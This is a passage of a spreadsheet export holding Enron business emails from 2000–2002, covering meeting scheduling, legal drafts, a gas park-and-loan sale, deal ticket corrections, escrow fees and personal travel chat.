'stephen.herber@enron.com', 'preston.roobaert@enron.com', 'sue.neville@enron.com', 'deborah.cappiello@enron.com', 'ranelle.paladino@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'lorraine.lindberg@enron.com', 'julie.mccoy@enron.com', 'lindy.donoho@enron.com', 'linda.wehring@enron.com', 'chris.sebesta@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>RE: Bid Cycle Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
=20_x000D_
_x000D_
The Bib Cycle meeting date is changed from Friday Oct.26th to Wednesday, Oc=_x000D_
t. 25th at 10:30 a.m.  The Houston folks will  use Dave Neubauer's office 3=_x000D_
963.  Omaha folks will use 696._x000D_
_x000D_
Jo will initiate the conference call:_x000D_
Houston 713-853-7240_x000D_
Mpls  952-887-1789_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Gracey, Rosemary =20_x000D_
Sent:=09Wednesday, October 17, 2001 11:17 AM_x000D_
To:=09Aschwege, Doug; Johnson, Robert L.; Sans Souci, Becki; Barker, Courtn=_x000D_
ey; Barry, Mike; Berg, Vicki; Bolks, Sean; Bollinger, Joni; Bowers, Janet; =_x000D_
Branney, Theresa; Brennan, Lorna; Burleson, Bob; Cabrera, Reyna; Cohrs, All=_x000D_
en; Donoho, Lindy; Dushinske, John; Fiscus, John; Fowler, Bill; Gadd, Eric;=_x000D_
 Gilbert, Steve; Halpin, Tom; Harris, Steven; Herber, Stephen; Hyatt, Kevin=_x000D_
; Johanson, Tim; Jones, Dana; Joyce, Jane; Korbelik, Stephanie; Lagerstrom,=_x000D_
 Karen; Lantefield, Laura; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle;=_x000D_
 McCarran, Penny; McGowan, Mike W.; Mercaldo, Vernon; Millar, John; Miller,=_x000D_
 Kent; Moore, Jan; Neubauer, Dave; Neville, Sue; Oldenhuis, Frank; Paladino=_x000D_
, Ranelle; Pavlou, Larry; Penkava, Loren; Powell, Don; Powers, Ken; Pritcha=_x000D_
rd, John; Riehm, Richard; Roobaert, Preston; Sebesta, Chris; Semin, Frank; =_x000D_
Stage, Michael G.; Stevens, Bob; Swett, Larry; Thomas, Steve; Threet, Kay; =_x000D_
Valley, Lisa; Watson, Kimberly; Weller, Steve; Westfall, Roger; Wilkinson, =_x000D_
Chuck; Williams, Jo; Williams, John; Cappiello, Deborah; Hook, Connie; McCo=_x000D_
y, Julie; Ramirez, Pilar; Robertson, Audrey; Wadle, Susan; Wehring, Linda_x000D_
Subject:=09Bid Cycle Meeting_x000D_
_x000D_
_x000D_
 &lt;&lt; File: BID CYCLE MEETING NOTICE.doc &gt;&gt; =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rosemary Gracey_x000D_
Marketing - 402/398-7431_x000D_
rosemary.gracey@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Sun, 15 Apr 2001 23:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  I haven't read it yet._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/16/2001 06:57 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Wright, Tremaine S." &lt;TremaineWright@paulhastings.com&gt; on 04/13/2001 _x000D_
10:10:10 PM_x000D_
To: "'chris.booth@enron.com'" &lt;chris.booth@enron.com&gt;, "'kay.mann@enron.com'" _x000D_
&lt;kay.mann@enron.com&gt;, "'michael.young@northwestern.com'" _x000D_
&lt;michael.young@northwestern.com&gt;, "'jkeffer@kslaw.com'" &lt;jkeffer@kslaw.com&gt;, _x000D_
"'mreuter@kslaw.com'" &lt;mreuter@kslaw.com&gt;_x000D_
cc: "Kahn, Marguerite R." &lt;MargueriteKahn@paulhastings.com&gt;, "DeBerry, _x000D_
Jeremiah A." &lt;JeremiahDeberry@paulhastings.com&gt; _x000D_
_x000D_
Subject: Attached Files_x000D_
_x000D_
_x000D_
_x000D_
We are attaching the following:_x000D_
1. Revised draft of the Letter Agreement (marked against the drafts of 4/11_x000D_
and 4/12)_x000D_
2. ENA Promissory Note (marked against the draft of 4/12)_x000D_
3. First Amended and Restated LLC Agreement (marked against the draft of_x000D_
4/12)_x000D_
4. Escrow Agreement (marked against the draft of 4/12)_x000D_
5. NorSub Promissory Note (marked against the draft of 4/12)_x000D_
_x000D_
We have no comments with respect to the Guaranty (other than the request_x000D_
that the "IN WITNESS WHEREOF" appears with the signature block)._x000D_
_x000D_
We look forward to discussing the attachments with you on Monday._x000D_
 &lt;&lt;Letter Agreement.DOC&gt;&gt;  &lt;&lt;blackline against April 11 draft.DOC&gt;&gt;_x000D_
&lt;&lt;blackline against April 12 draft.DOC&gt;&gt;  &lt;&lt;blackline E Note.DOC&gt;&gt;_x000D_
&lt;&lt;E-Note.DOC&gt;&gt;  &lt;&lt;blackline LLC Agreement.DOC&gt;&gt;  &lt;&lt;LLC Agreement.DOC&gt;&gt;_x000D_
&lt;&lt;Escrow Agreement.DOC&gt;&gt;  &lt;&lt;blackline - Escrow Agreement.DOC&gt;&gt;  &lt;&lt;Promissory_x000D_
Note.DOC&gt;&gt;  &lt;&lt;blackline - Promissory Note.DOC&gt;&gt;_x000D_
_x000D_
"paulhastings.com" made the following annotations on 04/13/01 23:10:37_x000D_
------------------------------------------------------------------------------_x000D_
NEW E-MAIL ADDRESSES AT PAUL, HASTINGS, JANOFSKY &amp; WALKER LLP_x000D_
_x000D_
We have changed our e-mail address.  Our new domain name is _x000D_
paulhastings.com.  In most cases, our address is composed of conventional _x000D_
first name and last name plus @paulhastings.com.  Here are two examples: _x000D_
janesmith@paulhastings.com and danjones@paulhastings.com.  If you have any _x000D_
questions, please contact us at noc@paulhastings.com._x000D_
_x000D_
==============================================================================_x000D_
"The information transmitted is intended only for the person or entity to _x000D_
which it is addressed and may contain confidential and/or privileged _x000D_
material. Any review, retransmission, dissemination or other use of, or _x000D_
taking of any action in reliance upon, this information by persons or _x000D_
entities other than the intended recipient is prohibited. If you received _x000D_
this in error, please contact the sender and delete the material from all _x000D_
computers."_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
 - Letter Agreement.DOC_x000D_
 - blackline against April 11 draft.DOC_x000D_
 - blackline against April 12 draft.DOC_x000D_
 - blackline E Note.DOC_x000D_
 - E-Note.DOC_x000D_
 - blackline LLC Agreement.DOC_x000D_
 - LLC Agreement.DOC_x000D_
 - Escrow Agreement.DOC_x000D_
 - blackline - Escrow Agreement.DOC_x000D_
 - Promissory Note.DOC_x000D_
 - blackline - Promissory Note.DOC_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 07:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'toth@dynegy.com'})</t>
  </si>
  <si>
    <t>Re: OFF DAYS</t>
  </si>
  <si>
    <t>Where are you going?</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 00:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'vicki.sharp@enron.com', 'rick.buy@enron.com', 'james.steffes@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>Composition of unsecured creditors committee</t>
  </si>
  <si>
    <t>Please see appointment list attached below:_x000D_
_x000D_
_x000D_
KES Kingsburg L.P. (QF?)_x000D_
City of Palo Alto (pension holdings?)_x000D_
Enron Corp &amp; Affiliates_x000D_
State of Tennessee (pension holdings?)_x000D_
Dynegy Power Marketing, Inc._x000D_
The Davey Tree Co. (vendor)_x000D_
GWF Power Systems (QF)_x000D_
U.S. Bank (Trustee on PCB's)_x000D_
Merrill Lynch (CP holder?)_x000D_
The Bank of New York (Bond Trustee)_x000D_
Bank of America (Agent on revolver)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  "Johnson, Stephen" &lt;Stephen.Johnson2@usdoj.gov&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+22Johnson+2C+20Stephen+22+20+3CStephen+2EJohnson2+40usdoj+_x000D_
2Egov+3E+40ENRON@ENRON.com] _x000D_
Sent: Tuesday, April 10, 2001 7:52 PM_x000D_
To: Johnson, Stephen; 'jmhpower@aol.com'; _x000D_
'grant_kolling@city.palo-alto.ca.us'; Tribolet, Michael; _x000D_
'tmilne@mail.state.tn.us'; 'john.c.herbert@dynegy.com'; _x000D_
'david.adante@davey.com'; 'pmar@mofo.com'; 'keith.marshall@usbank.com'; _x000D_
'mlurie@exchange.ml.com'; 'gbush@bankofny.com'; _x000D_
'clara.strand@bankofamerica.com'_x000D_
Subject: RE:_x000D_
_x000D_
I'm pretty sure the form was left off...._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Johnson, Stephen_x000D_
Sent: Tuesday, April 10, 2001 5:49 PM_x000D_
To: 'jmhpower@aol.com'; 'grant_kolling@city.palo-alto.ca.us'; _x000D_
'michael.tribolet@enron.com'; 'tmilne@mail.state.tn.us'; _x000D_
'john.c.herbert@dynegy.com'; 'david.adante@davey.com'; 'pmar@mofo.com'; _x000D_
'keith.marshall@usbank.com'; 'mlurie@exchange.ml.com'; 'gbush@bankofny.com'; _x000D_
'clara.strand@bankofamerica.com'_x000D_
Subject:_x000D_
_x000D_
_x000D_
_x000D_
Stephen L. Johnson_x000D_
Attorney_x000D_
United States Department of Justice_x000D_
Office of the U.S. Trustee_x000D_
250 Montgomery Street, Suite 1000_x000D_
San Francisco, CA 94104_x000D_
_x000D_
415-705-3333 tel._x000D_
415-705-3379 fax_x000D_
stephen.johnson2@usdoj.gov_x000D_
_x000D_
_x000D_
 - Appointment of Committee.pdf</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">You're right - I've changed this deal in Enpower._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
01/09/2001 02:05 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: natsource checkout_x000D_
_x000D_
492699_x000D_
i think the price on this deal should be 225.05?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Apr 2002 08:15:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Enbridge Consumers' Gas Park &amp; Loan</t>
  </si>
  <si>
    <t xml:space="preserve">do you have sabra's cell number?_x000D_
-----Original Message-----_x000D_
From: Brady, Kevin _x000D_
Sent: Wednesday, April 24, 2002 9:58 AM_x000D_
To: Germany, Chris_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
_x000D_
_x000D_
If that is the case then converting 327,081gj's to mm's yields 310,012mm's, so you are probably correct, I can adjust it to reduce down the 12mm's._x000D_
 _x000D_
Kevin_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Germany, Chris _x000D_
Sent: Wednesday, April 24, 2002 9:41 AM_x000D_
To: Brady, Kevin_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
 _x000D_
I wonder if that bigger volume is a gigajoule thing?_x000D_
-----Original Message-----_x000D_
From: Brady, Kevin _x000D_
Sent: Wednesday, April 24, 2002 9:14 AM_x000D_
To: Germany, Chris_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
I am starting to path it up right now, I have a question regarding the volume. The way I have interpreted these e-mails, we should be withdrawing a total of 310,000 from dawn storage, right now deal1199439 is set up to deliver 327,081. I can adjust the back end days to reduce our deliveries down to 310,000, just want to be sure this is our target #._x000D_
 _x000D_
Kevin Brady_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Germany, Chris _x000D_
Sent: Wednesday, April 24, 2002 7:57 AM_x000D_
To: Hamic, Priscilla_x000D_
Cc: Brady, Kevin_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
 _x000D_
Let Kevin know about any suspected unpathed deals and he will get all over it.  This guy is going to be my boss someday._x000D_
 _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Hamic, Priscilla _x000D_
Sent: Thursday, April 11, 2002 3:34 PM_x000D_
To: Germany, Chris; Greif, Donna; Dinari, Sabra L.; Polsky, Phil_x000D_
Cc: Concannon, Ruth; Garza, Maria; Dhont, Margaret_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
There is nothing in Deal Volume Tracking regarding this deal.  I checked with Rita Wynne and she says it needs to be pathed.  As soon as that is done and I am notified, we can get the invoice out to MidAmerican._x000D_
-----Original Message-----_x000D_
From: Germany, Chris _x000D_
Sent: Thursday, April 11, 2002 2:59 PM_x000D_
To: Hamic, Priscilla; Greif, Donna; Dinari, Sabra L.; Polsky, Phil_x000D_
Cc: Concannon, Ruth; Garza, Maria_x000D_
Subject: FW: Enbridge Consumers' Gas Park &amp; Loan_x000D_
Phil and I were just looking at some of the invoices created for March activity and I noticed the sale to MidAmerican Energy was not in his stack of invoices to review.  Would you see if we billed MidAmerican for March please?  The deal number is 1199439, the volume is 310,000 dth and the price is $2.47 per dth.  This was gas that the ENA Ontario desk had parked at Dawn.  There are more notes at the bottom of this email._x000D_
 _x000D_
 _x000D_
 _x000D_
-----Original Message-----_x000D_
From: McMichael Jr., Ed _x000D_
Sent: Thursday, February 28, 2002 9:56 AM_x000D_
To: Germany, Chris_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
Good Job!  Please document the sale and the other bids, timing issues, costs, and any other factors that led to or affected the sale.  If you have any questions, please ask._x000D_
Ed_x000D_
-----Original Message-----_x000D_
From: Germany, Chris _x000D_
Sent: Thursday, February 28, 2002 8:53 AM_x000D_
To: Mann, Kay; McMichael Jr., Ed; Concannon, Ruth; Parks, Joe_x000D_
Cc: Price, Wade R.; Dickson, Stacy E.; Olinger, Kimberly S.; Polsky, Phil; Boyt, Eric; Richardson, Stacey_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
Just sold 10,000 MMBtu per day at Dawn to MidAmerican Energy Company at $2.47 for March.  My contact at MidAmerican is Dave Evans (515-281-2698).  Dave said he was using Apr Nymx + $.05 to calculate his price._x000D_
-----Original Message-----_x000D_
From: Germany, Chris _x000D_
Sent: Wednesday, February 27, 2002 4:30 PM_x000D_
To: Mann, Kay; McMichael Jr., Ed; Concannon, Ruth; Parks, Joe_x000D_
Cc: Price, Wade R.; Dickson, Stacy E.; Olinger, Kimberly S.; Polsky, Phil; Boyt, Eric_x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
Update_x000D_
 _x000D_
Robin and I are waiting to hear back from all of the following_x000D_
 _x000D_
company                                                contact_x000D_
Reliant Energy Services Inc.                    Sue Cozad  989-687-9246  low probability_x000D_
Enbridge Gas Services Inc.                      Dan White  403-508-3184  new counterparty - low probability_x000D_
MidAmerican Energy Company                Dave Evans  515-281-2698  good prospect_x000D_
CMS Marketing, Services and Trading Company    Scott Biscoe  713-230-7286  low probability_x000D_
 _x000D_
El Paso      - no interest._x000D_
 _x000D_
Left messages with_x000D_
Duke Energy Marketing Ltd.                Steve Butler  403-297-9840_x000D_
TXU Energy???                                    David Jones  _x000D_
 _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Dickson, Stacy E. _x000D_
Sent: Wednesday, February 27, 2002 3:34 PM_x000D_
To: Mann, Kay; Germany, Chris_x000D_
Cc: Price, Wade R._x000D_
Subject: RE: Enbridge Consumers' Gas Park &amp; Loan_x000D_
The Goods and Services Tax (GST) in Canada is levied on sales of gas at a delivery point in Canada and where the gas will not be exported from Canada. The buyer pays the seller the amount of the  GST which is a per cent of the purchase price.  The seller, in turn, remits the amount of the GST to the appropriate Canadian authority.  In structuring the deal, be sure that you make it clear that the Contract Price does not include the GST.   If the gas it to be exported the buyer needs to notify that the gas is "zero-rated"  so it is not subject to the GST._x000D_
 _x000D_
Wade - Do you know who in settlements is handling GST payments?  I hope we still have someone who can do that.  _x000D_
 _x000D_
Please let me know if you have any other questions._x000D_
 _x000D_
Stacy_x000D_
x3-5705_x000D_
-----Original Message-----_x000D_
From: Mann, Kay _x000D_
Sent: Tuesday, February 26, 2002 7:02 PM_x000D_
To: Dickson, Stacy E._x000D_
Subject: FW: Enbridge Consumers' Gas Park &amp; Loan_x000D_
Do you know the answer to the tax question, or at least who to ask?_x000D_
 _x000D_
Thanks,_x000D_
 _x000D_
Kay_x000D_
-----Original Message----- _x000D_
From: Germany, Chris _x000D_
Sent: Tue 2/26/2002 5:46 PM _x000D_
To: Germany, Chris; McMichael Jr., Ed; Concannon, Ruth; Boyt, Eric; Garza, Maria; Polsky, Phil; Dicarlo, Louis; Olinger, Kimberly S.; Parks, Joe; Mann, Kay _x000D_
Cc: Fowler, Kulvinder; Schumack, Sherlyn _x000D_
Subject: Enbridge Consumers' Gas Park &amp; Loan_x000D_
Opps.  Didn't mean to hit send it just yet.  Much better now. _x000D_
 -----Original Message----- _x000D_
From:   Germany, Chris  _x000D_
Sent:   Tuesday, February 26, 2002 5:39 PM _x000D_
To:     McMichael Jr., Ed; Concannon, Ruth; Boyt, Eric; Garza, Maria; Polsky, Phil; Dicarlo, Louis; Olinger, Kimberly S.; Parks, Joe; Mann, Kay_x000D_
Cc:     Fowler, Kulvinder; Schumack, Sherlyn _x000D_
Subject:        Enbridge Consumers' Gas Park &amp; Loan _x000D_
Today we discovered that ENA has 310,000 MMBtu parked with The Consumers' Gas Company Ltd. (an affiliate of Enbridge Inc.) at Dawn that needs to be withdrawn by March 31, 2002.    Dan White (403-508-3184) at Enbridge faxed me their confirmation.  According to Dan, this gas was parked in May and June 2001.  Per Enbridge's confirmation, "Customer shall pay Enbridge a fee of $.22 US/MMBtu...prorated over 12 months".  The confirmation makes it clear that March withdrawals are interruptible.  Dan didn't know if ENA has paid the fee but he is letting ENA take this gas for March!!!  So far have not been able to find a deal ticket in Sitara or tagg that applies to this deal. _x000D_
Tomorrow, I will get bids from some of the companies ENA has done business with in the past at Dawn.  Before I sell the gas, I will _x000D_
        1.  verify the creditworthiness of the company we are selling to _x000D_
        2.  make sure the company we are selling to agrees to pay us for the gas and doesn't net this with some other item._x000D_
Kay, the point we are selling the gas at is Dawn which is in Canada.  Are there any special tax issues to address? _x000D_
 _x000D_
Any comments or questions? _x000D_
 _x000D_
Listed below are some of the companies ENA has done business with at Dawn _x000D_
AEP Energy Services, Inc.      _x000D_
Aquila Canada Corp.    _x000D_
BP Canada Energy Company       _x000D_
Cargill Energy Trading Canada, Inc.    _x000D_
CMS Marketing, Services and Trading Company    _x000D_
CoEnergy Trading Company       _x000D_
Consumers Energy Company       _x000D_
Consumers Gas Company Ltd., The_x000D_
Coral Energy Canada Inc.       _x000D_
Duke Energy Marketing Limited Partnership      _x000D_
Duke Energy Trading and Marketing, L.L.C.      _x000D_
Dynegy Canada Inc.     _x000D_
Dynegy Canada Marketing and Trade, a division of Dynegy Canada Inc.    _x000D_
El Paso Merchant Energy, L.P.  _x000D_
Engage Energy Canada L.P.      _x000D_
Nexen Marketing_x000D_
PanCanadian Petroleum Limited  _x000D_
PG&amp;E Energy Trading, Canada Corporation_x000D_
PG&amp;E Energy Trading-Gas Corporation    _x000D_
Phibro Inc.    _x000D_
Reliant Energy Services, Inc.  _x000D_
Sempra Energy Trading Corp.    _x000D_
TXU Energy Trading Canada Limited      _x000D_
WPS Energy Services, Inc.      _x000D_
_x000D_
                </t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 08:01:04 -0800 (PST)</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp_x000D_
_x000D_
 - 11-19 1000 Report.xls </t>
  </si>
  <si>
    <t>frozenset({'teresa.mcomber@enron.com', 'michael.olsen@enron.com'})</t>
  </si>
  <si>
    <t>Desk to Desk Ticket between NNG and PGEV and OPLC</t>
  </si>
  <si>
    <t>Daren has copied the old ticket and reput the volumes on a new deal ticket, _x000D_
dating back to the first, which reflects the correct Texas desk entity.  All _x000D_
of the buys/sales currently transacted at Waha by the Texas desk are done by _x000D_
HPLC-HPLC.  Please check your deal tickets as any volumes for April will need _x000D_
to be repathed, nom'd, etc._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Mary</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 06:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Oops, I meant to give you my office number if you had any questions about the_x000D_
trip.  It's 713-627-6559._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gerald.Nemec@enron.com on 09/20/2000 12:01:23 PM_x000D_
_x000D_
To:   Kelly OBrien/NorthAmerica/EnergyServices@DukePower_x000D_
cc:_x000D_
Subject:  Re: Football!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hi Kelly,    Sorry I haven't gotten back to you sooner, but have been_x000D_
swamped.  I am thinking the South Carolina game works.  However, what does_x000D_
a flight to Florida cost?  I need to factor that in as well, as I am_x000D_
planning on going to Spain in November and probably need to watch my $$$._x000D_
_x000D_
I have been to several OU games in Dallas, and it is actually more fun than_x000D_
the A&amp;M game because they split the stadium 50/50 Texas OU.  It is pretty_x000D_
intense.  I am trying to get tickets to the game this year and will_x000D_
probably go._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Kelly OBrien"_x000D_
                    &lt;kjobrien@duke-e        To:     gerald.nemec@enron.com_x000D_
                    nergy.com&gt;              cc:_x000D_
                                            Subject:     Football!_x000D_
                    09/18/2000 10:53_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Okay, here's the rest of the Gators' home schedule and the Longhorns'_x000D_
schedule_x000D_
for comparison._x000D_
_x000D_
          Gators              Longhorns_x000D_
Oct 7          LSU            Oklahoma in Dallas_x000D_
Oct 14         Auburn              at Colorado_x000D_
Nov 11         South Carolina      at Kansas_x000D_
_x000D_
Do you go to the game Oklahoma game in Dallas?  I went one year and it was_x000D_
a lot_x000D_
of fun._x000D_
_x000D_
So, if you have any desire to do this swap, let me know._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 01:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Citibank Fees</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/08/2001 09:18 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
01/02/2001 02:20 PM_x000D_
To: Kathleen Carnahan/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Citibank Fees_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 01/02/2001 02:20 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 01/02/2001 02:05:34 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc: "'Ben.F.Jacoby@enron.com'" &lt;Ben.F.Jacoby@enron.com&gt;, _x000D_
"'fred.mitro@enron.com'" &lt;fred.mitro@enron.com&gt;, "Keffer, John" _x000D_
&lt;JKeffer@KSLAW.com&gt; _x000D_
_x000D_
Subject: FW: Citibank Fees_x000D_
_x000D_
_x000D_
Kay:_x000D_
_x000D_
See the attached Citibank Schedule of Fees letter agreement.  Can ENA_x000D_
provide wiring instructions for insertion into the Escrow Agreements.  Thank_x000D_
you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Paradee, Lari [mailto:Lparade@INTERGEN.com]_x000D_
Sent: Tuesday, January 02, 2001 1:58 PM_x000D_
To: Campbell, Carolyn_x000D_
Cc: 'Lawrence, Estelle A'_x000D_
Subject: FW: Citibank Fees_x000D_
_x000D_
_x000D_
_x000D_
Carolyn,_x000D_
_x000D_
Happy New Year!_x000D_
_x000D_
Here is the Citibank Schedule of Fees updated with the "Waived for initial_x000D_
setup" and the "F." in Ben's name._x000D_
_x000D_
Do you have the wiring instructions yet so I can put them in the escrow_x000D_
documents and circulate those docs as final??_x000D_
_x000D_
Thanks,_x000D_
 Lari_x000D_
_x000D_
 -----Original Message-----_x000D_
From:   Steward, Shelly_x000D_
Sent:   Tuesday, January 02, 2001 9:24 AM_x000D_
To:     Paradee, Lari_x000D_
Subject:        Citibank Fees_x000D_
_x000D_
Good Morning Lari!_x000D_
_x000D_
&lt;&lt;Citibank Schedule of Fees.doc&gt;&gt;_x000D_
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 Citibank Schedule of Fees.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 07:59:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Upcoming Board Meeting</t>
  </si>
  <si>
    <t>I will be on the telephone on this one because of a management meeting the same day.  Mark_x000D_
_x000D_
-----Original Message-----_x000D_
From: Robert Pickel [mailto:RPICKEL@isda.org]_x000D_
Sent: Friday, October 12, 2001 5:53 PM_x000D_
To: ISDA BOARD_x000D_
Cc: Cynthia Richards_x000D_
Subject: Upcoming Board Meeting_x000D_
_x000D_
_x000D_
Our board meeting is scheduled for Tuesday, November 13, in New York. It is_x000D_
our annual budget meeting so it is an important meeting. I am aware,_x000D_
however, that some firms have instituted temporary bans or limitations on_x000D_
travel. It would be helpful to know for planning purposes whether you will_x000D_
be able to make it to New York for the meeting. George James is hosting the_x000D_
meeting here at the Morgan Stanley offices._x000D_
 _x000D_
Bob</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 09:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Approved._x000D_
_x000D_
---------------------- Forwarded by Rod Hayslett/FGT/Enron on 12/13/2000 _x000D_
05:05 PM ---------------------------_x000D_
_x000D_
_x000D_
Tracy Geaccone_x000D_
12/13/2000 04:33 PM_x000D_
To: Rod Hayslett/FGT/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Expense Report_x000D_
_x000D_
For your approval._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tracy_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 12/13/2000 _x000D_
04:34 PM ---------------------------_x000D_
_x000D_
_x000D_
Kathy Campos_x000D_
12/13/2000 03:47 PM_x000D_
To: Tracy Geaccone/GPGFIN/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Expense Report_x000D_
_x000D_
Tracy, _x000D_
_x000D_
Attached is your expense report, please review and forward for approval._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
Kathy_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 11:49:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Vac Time thru 093001.xls</t>
  </si>
  <si>
    <t>Thank you._x000D_
_x000D_
Tom_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Vuittonet, Laura  _x000D_
Sent:	Monday, October 15, 2001 11:32 AM_x000D_
To:	Martin, Thomas A._x000D_
Subject:	Vac Time thru 093001.xls_x000D_
_x000D_
 &lt;&lt; File: Vac Time thru 093001.xls &gt;&gt; _x000D_
Tom, I've attached a report that I downloaded from SAP, and that shows (in hours) how many hours of vacation you've taken, and how many hours you have remaining.  It's only thru the end of September, so the vacation that you took the other weekend is not included._x000D_
_x000D_
Just thought you might like to look at it._x000D_
Laura</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Hotel for the Wharton trip</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure I'm going to make it to Phila because of PRC.  I will advise _x000D_
next week.  Also, can you tell me Paula's last name that we rode with the _x000D_
other day when you all took me to the airport?  Thanks.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
11/20/2000 04:34 PM_x000D_
To: Jennifer Burns/HOU/ECT@ECT_x000D_
cc: Jeffrey A Shankman/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, _x000D_
piazzet@wharton.upenn.edu _x000D_
Subject: Hotel for the Wharton trip_x000D_
_x000D_
Jennifer,_x000D_
_x000D_
This is the address of the hotel within a walking distance to the Wharton _x000D_
School._x000D_
Please, make the reservation for Jeff Shankman at this hotel for the December _x000D_
the 6th meeting._x000D_
_x000D_
_x000D_
Vince Kaminski_x000D_
_x000D_
http://www.innatpenn.com/contact.html_x000D_
THE INN AT PENN_x000D_
                                   Sansom Common, 3600 Sansom Street_x000D_
                                   Philadelphia, PA. 19104_x000D_
                                   Phone: 1-800-809-7001_x000D_
                                   Fax: 215-222-4600_x000D_
_x000D_
_x000D_
Please, mention that the stay is related to the University business_x000D_
when making the reservation._x000D_
Tom Piazze at Wharton can confirm it. _x000D_
Tom Piazze_x000D_
Phone: (215) 898 1615_x000D_
piazzet@wharton.upenn.edu_x000D_
_x000D_
_x000D_
